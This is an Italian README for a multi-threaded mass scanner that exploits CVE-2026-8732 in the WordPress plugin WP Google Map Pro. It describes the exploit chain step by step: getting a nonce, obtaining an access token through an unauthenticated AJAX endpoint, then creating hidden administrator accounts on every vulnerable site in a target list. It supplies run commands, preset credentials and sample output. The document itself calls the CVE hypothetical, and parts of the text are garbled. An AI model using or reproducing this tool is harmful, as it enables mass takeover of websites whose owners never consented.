
Scanner di massa multi-thread per CVE-2026-8732 in WordPress WP Google Map Pro. Automatizza l'estrazione del nonce, lo sfruttamento del token e la creazione di account amministratore nascosti su siti vulnerabili.
Questo strumento sfrutta CVE-2026-8732, una vulnerabilità nel plugin WP Google Map Pro per WordPress. La vulnerabilità consente a un utente non autenticato di ottenere un wpmp_token valido tramite un endpoint AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). Utilizzando questo token, un attaccante può accedere al pannello di amministrazione di WordPress e creare un nuovo utente amministratore.
Lo strumento esegue una scansione di massa da un elenco di domini, estrae il nonce e il token e crea automaticamente un account amministratore nascosto sui siti vulnerabili. I risultati vengono salvati in tempo reale con i dettagli completi del token.
admin_created.txthttp:// che https://requestsInstalla la libreria richiesta:
pip install requests
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
Prepara un file con l'elenco dei target (un dominio per riga):
example.com
https://target-website.com
http://vulnerable-site.org
Esegui lo scanner:
python2 exploit.py targets.txt
| File | Contenuto |
|---|---|
res.txt | Domini vulnerabili con token completo e URL di reindirizzamento (se presente) |
admin_created.txt | Credenziali admin create con successo (dominio, username, password, email) |
[*] Controllo: https://example.com
[VULNERABILE] https://example.com -> Token trovato
[*] https://example.com -> Accesso all'URL di reindirizzamento...
[+] https://example.com -> Admin creato: securityaudit_1734567890 / StrongP@ssw0rd123!
Modifica le seguenti variabili all'interno dello script:
TIMEOUT = 10 # Timeout della richiesta in secondi
JUMLAH_THREAD = 10 # Numero di thread concorrenti
OUTPUT_FILE = "res.txt" # File per i risultati vulnerabili
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
wpgmp_local o fc-call-nonce dall'HTML./wp-admin/admin-ajax.php con action=wpgmp_temp_access_ajax e il nonce ottenuto./wp-admin/user-new.php, estrae _wpnonce_create-user e invia un POST per creare un nuovo utente amministratore.users.php o cerca il nuovo nome utente nell'elenco utenti per confermare il successo.wpgmp_temp_access_ajax tramite codice personalizzato o firewall.admin-ajax.php.| Campo | Valore |
|---|
| ID CVE | CVE-2026-8732 (ipotetico per questo plugin) |
| Plugin interessato | WP Google Map Pro (versioni <= 1.5.0) |
| Tipo di vulnerabilità | Controllo di accesso non corretto / Escalation dei privilegi |
| Vettore d'attacco | Non autenticato, Remoto |
| Impatto | Presa totale del sito tramite creazione di account amministratore |